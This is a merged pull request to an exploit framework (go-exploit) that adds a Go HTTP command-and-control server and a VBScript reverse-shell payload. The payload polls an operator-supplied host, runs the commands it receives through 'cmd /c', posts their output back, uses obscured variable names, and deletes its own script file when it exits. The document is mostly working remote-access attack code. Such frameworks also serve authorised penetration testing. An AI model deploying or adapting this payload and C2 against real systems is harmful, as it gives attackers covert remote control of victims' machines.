Merge pull request #357 from lobsterjerusalem/httpshellserver

Adding a new HTTP-based C2 and compatible VBS payload

Author: j-baines

c2/factory.go

@@ -5,6 +5,7 @@ import (
 	"github.com/vulncheck-oss/go-exploit/c2/external"
 	"github.com/vulncheck-oss/go-exploit/c2/httpservefile"
 	"github.com/vulncheck-oss/go-exploit/c2/httpserveshell"
+	"github.com/vulncheck-oss/go-exploit/c2/httpshellserver"
 	"github.com/vulncheck-oss/go-exploit/c2/shelltunnel"
 	"github.com/vulncheck-oss/go-exploit/c2/simpleshell"
 	"github.com/vulncheck-oss/go-exploit/c2/sslshell"
@@ -37,6 +38,7 @@ const (
 	HTTPServeShellCategory    category = 4
 	ExternalCategory          category = 5
 	ShellTunnelCategory       category = 6
+	HTTPShellServerCategory   category = 7
 )
 
 // Simplified names in order to keep the old calling convention and allow
@@ -48,6 +50,7 @@ var (
 	HTTPServeFile     = internalSupported["HTTPServeFile"]
 	HTTPServeShell    = internalSupported["HTTPServeShell"]
 	ShellTunnel       = internalSupported["ShellTunnel"]
+	HTTPShellServer   = internalSupported["HTTPShellServer"]
 	// We do not want external to be called directly because external
 	// internally is not useful.
 )
@@ -61,6 +64,7 @@ var internalSupported = map[string]Impl{
 	"SSLShellServer":    {Name: "SSLShellServer", Category: SSLShellServerCategory},
 	"HTTPServeFile":     {Name: "HTTPServeFile", Category: HTTPServeFileCategory},
 	"HTTPServeShell":    {Name: "HTTPServeShell", Category: HTTPServeShellCategory},
+	"HTTPShellServer":   {Name: "HTTPShellServer", Category: HTTPShellServerCategory},
 	// Insure the internal supported External module name is an error if used
 	// directly.
 	"External":    {Name: "", Category: InvalidCategory},
@@ -103,6 +107,8 @@ func GetInstance(implementation Impl) (Interface, bool) {
 		if implementation.Name != "" {
 			return external.GetInstance(implementation.Name), true
 		}
+	case HTTPShellServerCategory:
+		return httpshellserver.GetInstance(), true
 	case ShellTunnelCategory:
 		return shelltunnel.GetInstance(), true
 	case InvalidCategory:
@@ -132,6 +138,8 @@ func CreateFlags(implementation Impl) {
 		if implementation.Name != "" {
 			external.GetInstance(implementation.Name).CreateFlags()
 		}
+	case HTTPShellServerCategory:
+		httpshellserver.GetInstance().CreateFlags()
 	case ShellTunnelCategory:
 		shelltunnel.GetInstance().CreateFlags()
 	case InvalidCategory:

c2/httpshellserver/httpshellserver.go

@@ -0,0 +1,206 @@
+package httpshellserver
+
+import (
+	"bufio"
+	"crypto/tls"
+	"flag"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/vulncheck-oss/go-exploit/c2/channel"
+	"github.com/vulncheck-oss/go-exploit/encryption"
+	"github.com/vulncheck-oss/go-exploit/random"
+	"github.com/vulncheck-oss/go-exploit/output"
+)
+
+var (
+	singleton   *Server
+	cliLock     sync.Mutex
+	commandChan = make(chan string)
+	lastSeen    time.Time
+)
+
+type Server struct {
+	// The HTTP address to bind to
+	HTTPAddr string
+	// The HTTP port to bind to
+	HTTPPort int
+	// Set to the Server field in HTTP response
+	ServerField string
+	// Indicates if TLS should be enabled
+	TLS bool
+	// The file path to the user provided private key (if provided)
+	PrivateKeyFile string
+	// The file path to the user provided certificate (if provided)
+	CertificateFile string
+	// Loaded certificate
+	Certificate tls.Certificate
+	// Allows us to track if a connection has been received during the life of the server
+	Success bool
+	// Randomly generated during init, gives some sense of security where there is otherwise none.
+	// This should appear in a header with the name VC-Auth
+	AuthHeader string
+}
+
+// A basic singleton interface for the c2.
+func GetInstance() *Server {
+	if singleton == nil {
+		singleton = new(Server)
+	}
+
+	return singleton
+}
+
+func (httpServer *Server) Init(channel channel.Channel) bool {
+	httpServer.AuthHeader = random.RandLetters(20)
+	if channel.IsClient {
+		output.PrintFrameworkError("Called C2HTTPServer as a client. Use lhost and lport.")
+
+		return false
+	}
+
+	switch {
+	case channel.Port != 0:
+		httpServer.HTTPAddr = channel.IPAddr
+		httpServer.HTTPPort = channel.Port
+	default:
+		output.PrintFrameworkError("Called HTTPServeFile without specifying a bind port.")
+
+		return false
+	}
+
+	if httpServer.TLS {
+		var ok bool
+		var err error
+		if len(httpServer.CertificateFile) != 0 && len(httpServer.PrivateKeyFile) != 0 {
+			httpServer.Certificate, err = tls.LoadX509KeyPair(httpServer.CertificateFile, httpServer.PrivateKeyFile)
+			if err != nil {
+				output.PrintfFrameworkError("Error loading certificate: %s", err.Error())
+
+				return false
+			}
+		} else {
+			output.PrintFrameworkStatus("Certificate not provided. Generating a TLS Certificate")
+			httpServer.Certificate, ok = encryption.GenerateCertificate()
+			if !ok {
+				return false
+			}
+		}
+	}
+
+	return true
+}
+
+// User options for serving a file over HTTP as the "c2".
+func (httpServer *Server) CreateFlags() {
+	flag.StringVar(&httpServer.ServerField, "httpShellServer.ServerField", "Apache", "The value to insert in the HTTP server field")
+	flag.BoolVar(&httpServer.TLS, "httpShellServer.TLS", false, "Indicates if the HTTP server should use encryption")
+	flag.StringVar(&httpServer.PrivateKeyFile, "httpShellServer.PrivateKeyFile", "", "A private key to use with the HTTPS server")
+	flag.StringVar(&httpServer.CertificateFile, "httpShellServer.CertificateFile", "", "The certificate to use with the HTTPS server")
+}
+
+// start the HTTP server and listen for incoming requests for `httpServer.FileName`.
+//nolint:gocognit
+func (httpServer *Server) Run(timeout int) {
+	http.HandleFunc("/rx", func(writer http.ResponseWriter, req *http.Request) {
+		authHeader := req.Header.Get("VC-Auth")
+		if authHeader != httpServer.AuthHeader {
+			writer.WriteHeader(http.StatusForbidden)
+			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("VC-Auth"), httpServer.AuthHeader)
+			
+			return
+		}
+		body, _ := io.ReadAll(req.Body)
+		if strings.TrimSpace(string(body)) != "" {
+			fmt.Printf("\n%s: %s\n", req.RemoteAddr, string(body))
+		}
+	})
+
+	http.HandleFunc("/", func(writer http.ResponseWriter, req *http.Request) {
+		authHeader := req.Header.Get("VC-Auth")
+		if authHeader != httpServer.AuthHeader {
+			writer.WriteHeader(http.StatusForbidden)
+			output.PrintfFrameworkDebug("Auth header mismatch from %s: %s, should be %s", req.RemoteAddr, req.Header.Get("VC-Auth"), httpServer.AuthHeader)
+			
+			return
+		}
+		lastSeen = time.Now()
+		writer.Header().Set("Server", httpServer.ServerField)
+
+		if !httpServer.Success {
+			go func() {
+				httpServer.Success = true
+				output.PrintfSuccess("Received initial connection from %s, entering shell", req.RemoteAddr)
+				cliLock.Lock()
+				defer cliLock.Unlock()
+				for {
+					elapsed := time.Since(lastSeen)
+					if elapsed/time.Millisecond > 10000 {
+						fmt.Printf("last seen: %ds> ", time.Since(lastSeen)/time.Second)
+					} else {
+						fmt.Printf("last seen: %dms> ", time.Since(lastSeen)/time.Millisecond)
+					}
+					reader := bufio.NewReader(os.Stdin)
+					command, _ := reader.ReadString('\n')
+					trimmedCommand := strings.TrimSpace(command)
+					if trimmedCommand == "help" {
+						fmt.Printf("Usage:\nType a command and it will be added to the queue to be distributed to the first connection\ntype exit to shut everything down.\n")
+
+						continue
+					}
+					if trimmedCommand == "exit" {
+						output.PrintStatus("Exit received, shutting down")
+
+						os.Exit(0)
+					}
+					if strings.TrimSpace(command) != "" {
+						commandChan <- strings.TrimSpace(command)
+					}
+				}
+			}()
+		}
+
+		select {
+		case command := <-commandChan:
+			writer.WriteHeader(http.StatusOK)
+			fmt.Fprint(writer, command)
+		default:
+			writer.WriteHeader(http.StatusOK)
+		}
+	})
+
+	connectionString := fmt.Sprintf("%s:%d", httpServer.HTTPAddr, httpServer.HTTPPort)
+	go func() {
+		if httpServer.TLS {
+			output.PrintfFrameworkStatus("Starting an HTTPS server on %s...", connectionString)
+			tlsConfig := &tls.Config{
+				Certificates: []tls.Certificate{httpServer.Certificate},
+				// We have no control over the SSL versions supported on the remote target. Be permissive for more targets.
+				//nolint
+				MinVersion: tls.VersionSSL30,
+			}
+			server := http.Server {
+				Addr:      connectionString,
+				TLSConfig: tlsConfig,
+				// required to disable HTTP/2 according to https://pkg.go.dev/net/http#hdr-HTTP_2
+				TLSNextProto: make(map[string]func(*http.Server, *tls.Conn, http.Handler),1),
+			}
+			defer server.Close()
+			_ = server.ListenAndServeTLS("", "")
+		} else {
+			output.PrintfFrameworkStatus("Starting an HTTP server on %s", connectionString)
+			_ = http.ListenAndServe(connectionString, nil)
+		}
+	}()
+
+	// let the server run for timeout seconds
+	time.Sleep(time.Duration(timeout) * time.Second)
+
+	// We don't actually clean up anything, but exiting c2 will eventually terminate the program
+	output.PrintFrameworkStatus("Shutting down the HTTP Shell Server")
+}

payload/reverse/reverse.go

@@ -37,10 +37,11 @@ type (
 	PythonPayload    struct{}
 	TelnetPayload    struct{}
 	GroovyPayload    struct{}
+	VBSHTTPPayload   struct{}
 )
 
-// Makes the Bash payloads accessible via `reverse.Bash`.
 var (
+	// Example: makes the Bash payloads accessible via `reverse.Bash`.
 	Bash     = &BashPayload{}
 	GJScript = &GJScriptPayload{}
 	JJS      = &JJSScriptPayload{}
@@ -51,4 +52,5 @@ var (
 	Python   = &PythonPayload{}
 	Telnet   = &TelnetPayload{}
 	Groovy   = &GroovyPayload{}
+	VBSHTTP  = &VBSHTTPPayload{}
 )

payload/reverse/vbs.go

@@ -0,0 +1,21 @@
+package reverse
+
+import (
+	_ "embed"
+	"fmt"
+)
+
+var (
+	//go:embed vbs/reverse_http.vbs
+	VBSShell string
+)
+
+// Generates a script that can be used to create a reverse shell via vbs (can be run with cscript)
+// original source: https://raw.githubusercontent.com/cym13/vbs-reverse-shell/refs/heads/master/reverse_shell.vbs
+func (vbs *VBSHTTPPayload) Default(lhost string, lport int, ssl bool, authHeader string) string {
+	if ssl {
+		return fmt.Sprintf(VBSShell, "https", lhost, lport, authHeader)
+	}
+
+	return fmt.Sprintf(VBSShell, "http", lhost, lport, authHeader)
+}

payload/reverse/vbs/reverse_http.vbs

@@ -0,0 +1,52 @@
+Option Explicit
+
+CONST lkasjfo = "%s://%s:%d/"
+CONST fowihe = "%s"
+
+Dim xmlHttpReq, shell, execObj, alfkj, break, result, fa
+
+Set shell = CreateObject("WScript.Shell")
+
+break = False
+While break <> True
+Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP")
+    xmlHttpReq.Open "GET", lkasjfo, false
+    xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
+    xmlHttpReq.setRequestHeader "VC-Auth", fowihe
+    xmlHttpReq.Send
+
+    If (xmlHttpReq.status <> 200) Then
+        fa = fa + 1
+        If fa > 5 Then
+            break = True
+        End If
+    Else
+        fa = 0
+    End If
+
+    If Trim(xmlHttpReq.responseText) <> "" Then
+        alfkj = "cmd    /c " & Trim(xmlHttpReq.responseText)
+
+        If InStr(alfkj, "exit") Then
+            break = True
+        Else
+            Set execObj = shell.Exec(alfkj)
+
+            result = ""
+            Do Until execObj.StdOut.AtEndOfStream
+                result = result & execObj.StdOut.ReadAll()
+            Loop
+
+            Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP")
+            xmlHttpReq.Open "POST", lkasjfo & "rx", false
+            xmlHttpReq.SetOption 2, xmlHttpReq.GetOption(2)
+            xmlHttpReq.setRequestHeader "VC-Auth", fowihe
+            xmlHttpReq.Send(result)
+        End If
+    End If
+    WScript.Sleep 500
+Wend
+
+Set objFSO = CreateObject("Scripting.FileSystemObject")
+strScript = Wscript.ScriptFullName
+objFSO.DeleteFile(strScript)